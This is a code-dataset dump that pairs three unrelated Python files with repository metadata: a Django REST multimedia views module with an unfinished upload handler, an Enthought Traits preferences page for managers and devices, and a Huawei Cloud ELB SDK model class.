from engine.utils import get_request_token, get_user_token
# JWT helper callables resolved once from the configured DRF-JWT settings.
jwt_payload_handler = api_settings.JWT_PAYLOAD_HANDLER
jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER


@api_view(['GET'])
def api_root(request, format=None):
    # Browsable-API entry point: links to the multimedia list endpoint.
    return Response({
        'multimedia': reverse('multimedia-list', request=request, format=format),
    })
class MultimediaHandler(APIView):
    # Multipart upload endpoint for authenticated users.
    #authentication_classes = (authentication.JSONWebTokenAuthentication,)
    permission_classes = (permissions.IsAuthenticated,)
    #permission_classes = (permissions.IsAdminUser,)

    def post(self, request, format=None):
        # NOTE(review): 'serializer' is never assigned — its construction
        # below is commented out, so this handler raises NameError at
        # runtime.  Restore a serializer (presumably UserAvatarSerializer,
        # per the commented lines) before enabling this endpoint.
        print("request.FILES")
        print(request.FILES)
        request.FILES  # no-op expression; likely leftover debugging
        #serializer = UserAvatarSerializer(files=request.FILES)
        #print("serializer")
        #print(serializer)
        if serializer.is_valid():
            print("funca")
            serializer.save()
            return Response(serializer.data)
"""
class MultimediaHandler(viewsets.ModelViewSet):
queryset = MulUserModel.objects.all()
serializer_class = UserAvatarSerializer
permission_classes = (permissions.IsAuthenticated,)
parser_classes = (MultiPartParser, FormParser,)
@get_user_token
#@get_multimedia
#def create_img(self, request, pk=None):
def create_img(self, obj):
print("l")
obj.temp_file = self.request.FILES.get('image')
print("obj")
print(obj)
"""
class MultimediaUser(viewsets.ModelViewSet):
    """CRUD endpoints for per-user multimedia records."""
    queryset = MulUserModel.objects.all()
    serializer_class = MulUserSerializer
    permission_classes = (permissions.IsAuthenticated,)

    @get_user_token
    #@get_multimedia
    def create_post(self, request, pk=None):
        # NOTE(review): stub — only prints; no post is created yet.
        print("l")
class MultimediaCategory(viewsets.ModelViewSet):
    """CRUD endpoints for multimedia categories."""
    queryset = MulCatModel.objects.all()
    serializer_class = MulCatSerializer
    permission_classes = (permissions.IsAuthenticated,)

    def perform_create(self, serializer):
        # Same as the ModelViewSet default; kept as an explicit hook point.
        serializer.save()
class MultimediaSubcategory(viewsets.ModelViewSet):
    """CRUD endpoints for multimedia subcategories."""
    queryset = MulSubCModel.objects.all()
    serializer_class = MulSubCSerializer
    permission_classes = (permissions.IsAuthenticated,)

    def perform_create(self, serializer):
        # Same as the ModelViewSet default; kept as an explicit hook point.
        serializer.save()
class MultimediaPost(viewsets.ModelViewSet):
    """CRUD endpoints for multimedia posts."""
    queryset = MulPostModel.objects.all()
    serializer_class = MulPostSerializer
    permission_classes = (permissions.IsAuthenticated,)

    def perform_create(self, serializer):
        # Same as the ModelViewSet default; kept as an explicit hook point.
        serializer.save()
|
[
"giovanniyatze@gmail.com"
] |
giovanniyatze@gmail.com
|
d2c68acf9b53244d3d86dcddc2dfb141b3295ea1
|
99d7a6448a15e7770e3b6f3859da043300097136
|
/src/managers/plugins/manager_preferences_page.py
|
108378a6b8bff9ec02512d2ba1c2ea9974fed843
|
[] |
no_license
|
softtrainee/arlab
|
125c5943f83b37bc7431ae985ac7b936e08a8fe4
|
b691b6be8214dcb56921c55daed4d009b0b62027
|
refs/heads/master
| 2020-12-31T07:54:48.447800
| 2013-05-06T02:49:12
| 2013-05-06T02:49:12
| 53,566,313
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,279
|
py
|
#===============================================================================
# Copyright 2011 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
#============= enthought library imports =======================
from traits.api import HasTraits, Str, Bool, Float, List, on_trait_change, \
Range, Instance
from traitsui.api import View, Item, VGroup, TableEditor, Group, HGroup
from apptools.preferences.ui.api import PreferencesPage
from traitsui.table_column import ObjectColumn
from traitsui.extras.checkbox_column import CheckboxColumn
#============= standard library imports ========================
#============= local library imports ==========================
from src.helpers.parsers.initialization_parser import InitializationParser
class CItem(HasTraits):
    """Checkbox row shown in the managers/devices preference tables."""
    # 'enabled' mirrors the enabled flag stored in the initialization file.
    enabled = Bool
    name = Str
class ManagerPreferencesPage(PreferencesPage):
    '''
        abstract class. should not be used directly
        ensure subclass sets plugin_name

        Presents checkbox tables for the plugin's managers and devices and
        writes enable/disable changes straight back to the initialization
        file through InitializationParser.
    '''
    # transient=True keeps these UI-only lists out of persisted preferences.
    devices = List(transient=True)
    managers = List(transient=True)
    # Name of the plugin section in the initialization file; must be set
    # by every concrete subclass.
    plugin_name = None

    open_on_startup = Bool
    enable_close_after = Bool
    close_after = Range(0, 60, 60)

    # Window geometry defaults (semantics of the fractional/negative
    # values are defined by the consumer of these preferences — TODO confirm).
    width = Float(-1)
    height = Float(0.85)
    x = Float(10)
    y = Float(20)

    parser = Instance(InitializationParser, (), transient=True)

    @on_trait_change('managers:enabled')
    def _managers_changed(self, obj, name, old, new):
        # Persist a manager checkbox toggle to the initialization file.
        if new:
            self.parser.enable_manager(obj.name, self.plugin_name)
        else:
            self.parser.disable_manager(obj.name, self.plugin_name)

    @on_trait_change('devices:enabled')
    def _devices_changed(self, obj, name, old, new):
        # Persist a device checkbox toggle to the initialization file.
        if new:
            self.parser.enable_device(obj.name, self.plugin_name)
        else:
            self.parser.disable_device(obj.name, self.plugin_name)

    def _managers_default(self):
        # Build the managers table from this plugin's section of the
        # initialization file; all=True includes disabled entries.
        r = []
        # get the plugin this manager belongs to
        plugin = self.parser.get_plugin(self.plugin_name)
        mans = self.parser.get_managers(plugin, element=True, all=True)
        if mans is not None:
            r = [CItem(enabled=True if m.get('enabled').lower() == 'true' else False,
                       name=m.text.strip()
                       )
                 for m in mans]
        return r

    def _devices_default(self):
        # Same as _managers_default, for the plugin's devices.
        r = []
        # get the plugin this manager belongs to
        plugin = self.parser.get_plugin(self.plugin_name)
        devs = self.parser.get_devices(plugin, element=True, all=True)
        if devs is not None:
            r = [CItem(enabled=True if d.get('enabled').lower() == 'true' else False,
                       name=d.text.strip()
                       )
                 for d in devs]
        return r

    def get_additional_groups(self):
        # Hook for subclasses to append extra preference groups to the view.
        return []

    def get_general_group(self):
        # 'General' tab content: startup behaviour plus window geometry.
        window_grp = Group('width',
                           'height',
                           'x', 'y')
        return Group(Item('open_on_startup'),
                     HGroup(
                         Item('close_after', enabled_when='enable_close_after'),
                         Item('enable_close_after', show_label=False)
                     ),
                     window_grp
                     )

    #============= views ===================================
    def traits_view(self):
        '''
            Tabbed view: General | Managers | Devices, plus any groups
            contributed by get_additional_groups().
        '''
        cols = [CheckboxColumn(name='enabled',
                               ),
                ObjectColumn(name='name', editable=False)
                ]
        table_editor = TableEditor(columns=cols)
        devices_group = VGroup(Item('devices', show_label=False,
                                    editor=table_editor,
                                    height=400
                                    ),
                               label='Devices'
                               )
        manager_group = VGroup(Item('managers', show_label=False,
                                    editor=table_editor,
                                    height=400
                                    ),
                               label='Managers'
                               )
        grp = Group(
            manager_group,
            devices_group,
            layout='tabbed')

        ggrp = self.get_general_group()
        if ggrp is not None:
            # General tab goes first when a subclass provides one.
            ggrp.label = 'General'
            grp.content.insert(0, ggrp)

        for ag in self.get_additional_groups():
            grp.content.append(ag)

        v = View(
            grp
        )
        return v
|
[
"jirhiker@localhost"
] |
jirhiker@localhost
|
e6808933779bd451c7f3c2aed9096baf82d6ac01
|
a2d36e471988e0fae32e9a9d559204ebb065ab7f
|
/huaweicloud-sdk-elb/huaweicloudsdkelb/v2/model/l7rules_in_status_resp.py
|
ff144526f91124a278e439806850ab972c0a4e27
|
[
"Apache-2.0"
] |
permissive
|
zhouxy666/huaweicloud-sdk-python-v3
|
4d878a90b8e003875fc803a61414788e5e4c2c34
|
cc6f10a53205be4cb111d3ecfef8135ea804fa15
|
refs/heads/master
| 2023-09-02T07:41:12.605394
| 2021-11-12T03:20:11
| 2021-11-12T03:20:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,606
|
py
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class L7rulesInStatusResp:
    """Provisioning-status entry for a single L7 forwarding rule.

    openapi_types maps attribute name to attribute type; attribute_map
    maps attribute name to the JSON key used in the API definition.
    """

    sensitive_list = []

    openapi_types = {
        'type': 'str',
        'id': 'str',
        'provisioning_status': 'str'
    }

    attribute_map = {
        'type': 'type',
        'id': 'id',
        'provisioning_status': 'provisioning_status'
    }

    def __init__(self, type=None, id=None, provisioning_status=None):
        """L7rulesInStatusResp - a model defined in huaweicloud sdk"""
        # Backing fields for the properties below.
        self._type = None
        self._id = None
        self._provisioning_status = None
        self.discriminator = None
        # Route the constructor arguments through the property setters.
        self.type = type
        self.id = id
        self.provisioning_status = provisioning_status

    @property
    def type(self):
        """Content matched by the rule: PATH matches the request path,
        HOST_NAME matches the request domain name.

        :rtype: str
        """
        return self._type

    @type.setter
    def type(self, type):
        """Set the match content of this rule.

        :type: str
        """
        self._type = type

    @property
    def id(self):
        """Forwarding rule ID.

        :rtype: str
        """
        return self._id

    @id.setter
    def id(self, id):
        """Set the forwarding rule ID.

        :type: str
        """
        self._id = id

    @property
    def provisioning_status(self):
        """Provisioning status of the rule; reserved field, defaults to
        ACTIVE.

        :rtype: str
        """
        return self._provisioning_status

    @provisioning_status.setter
    def provisioning_status(self, provisioning_status):
        """Set the provisioning status of this rule.

        :type: str
        """
        self._provisioning_status = provisioning_status

    def to_dict(self):
        """Return the model's properties as a dict, masking sensitive ones."""
        result = {}
        for attr in self.openapi_types:
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = [
                    item.to_dict() if hasattr(item, "to_dict") else item
                    for item in value
                ]
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = {
                    key: val.to_dict() if hasattr(val, "to_dict") else val
                    for key, val in value.items()
                }
            elif attr in self.sensitive_list:
                result[attr] = "****"
            else:
                result[attr] = value
        return result

    def to_str(self):
        """Return the string representation of the model."""
        import simplejson as json
        if six.PY2:
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")
        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Models are equal when they share the type and the full state."""
        return isinstance(other, L7rulesInStatusResp) and self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Inverse of __eq__."""
        return not self == other
|
[
"hwcloudsdk@huawei.com"
] |
hwcloudsdk@huawei.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.